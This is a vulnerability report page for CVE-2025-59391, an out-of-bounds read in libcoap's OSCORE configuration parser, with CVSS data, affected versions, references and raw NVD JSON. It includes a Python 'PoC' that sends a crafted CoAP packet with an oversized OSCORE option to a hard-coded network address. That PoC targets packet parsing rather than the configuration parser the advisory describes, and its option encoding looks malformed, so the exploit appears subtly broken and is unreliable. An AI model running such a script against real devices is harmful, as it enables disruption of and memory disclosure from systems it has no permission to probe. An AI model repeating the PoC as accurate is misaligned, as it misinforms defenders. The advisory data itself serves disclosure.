Security Vulnerability Report
CVE-2025-59391 CVSS 6.5 MEDIUM

CVE-2025-59391

Published: 2025-12-08 17:16:20
Last Modified: 2025-12-12 12:34:01

Description

A memory disclosure vulnerability exists in libcoap's OSCORE configuration parser in libcoap before release-4.3.5-patches. An out-of-bounds read may occur when parsing certain configuration values, allowing an attacker to infer or read memory beyond string boundaries in the .rodata section. This could potentially lead to information disclosure or denial of service.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:* - VULNERABLE
libcoap < release-4.3.5-patches
libcoap < v4.3.5a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59391 PoC - libcoap OSCORE Configuration Parser OOB Read
# This PoC demonstrates triggering an out-of-bounds read in libcoap's OSCORE parser
import struct
import socket


def create_malicious_config():
    """Generate malicious OSCORE configuration to trigger OOB read"""
    # Craft an OSCORE configuration with oversized ID fields
    config = bytearray()

    # OSCORE option header
    config += bytes([0xAB])  # Option number for OSCORE

    # Malformed OSCORE payload with oversized sender_id
    # sender_id length exceeds expected buffer size
    oversized_id = b'A' * 512  # 512 bytes when parser expects much less

    # Construct payload that triggers the vulnerable parsing path
    payload = bytearray()
    payload += bytes([0x01])  # OSCORE flag byte
    payload += struct.pack('>H', len(oversized_id))  # Length prefix
    payload += oversized_id
    payload += bytes([0x02, 0x03])  # Additional malformed fields

    config += bytes([len(payload)])  # Option length
    config += payload
    return bytes(config)


def send_exploit(target_host, target_port=5683):
    """Send malicious CoAP packet with OSCORE configuration"""
    pkt = bytearray()

    # CoAP Header
    pkt += bytes([0x40, 0x03])  # Version 1, CON, POST
    pkt += bytes([0x00, 0x01])  # Message ID
    pkt += bytes([0x00])  # Token length = 0

    # URI-Path option (required for OSCORE request)
    pkt += bytes([0x03, 0x01, 0x2E])

    # OSCORE option
    pkt += create_malicious_config()

    # Payload marker
    pkt += bytes([0xFF])

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    try:
        sock.sendto(pkt, (target_host, target_port))
        response, addr = sock.recvfrom(4096)
        return response
    except socket.timeout:
        return None
    finally:
        sock.close()


if __name__ == "__main__":
    target = "192.168.1.100"
    result = send_exploit(target)
    print(f"[*] Sent malicious OSCORE config to {target}")
    if result:
        print(f"[*] Response received: {result.hex()}")
        print("[*] Potential OOB read triggered - analyze response for leaked memory")
    else:
        print("[*] No response - target may have crashed or is filtering")

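References

https://github.com/obgm/libcoap/pull/1730 (Issue Tracking, Patch)
https://github.com/obgm/libcoap/releases/tag/v4.3.5a (Release Notes)
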
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59391", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:20.080", "lastModified": "2025-12-12T12:34:00.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory disclosure vulnerability exists in libcoap's OSCORE configuration parser in libcoap before release-4.3.5-patches. An out-of-bounds read may occur when parsing certain configuration values, allowing an attacker to infer or read memory beyond string boundaries in the .rodata section. This could potentially lead to information disclosure or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3.5a", "matchCriteriaId": "8519F781-B2B5-48CA-BE86-B187221928B6"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/pull/1730", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/obgm/libcoap/releases/tag/v4.3.5a", "source": "[email protected]", "tags": ["Release Notes"]}]}}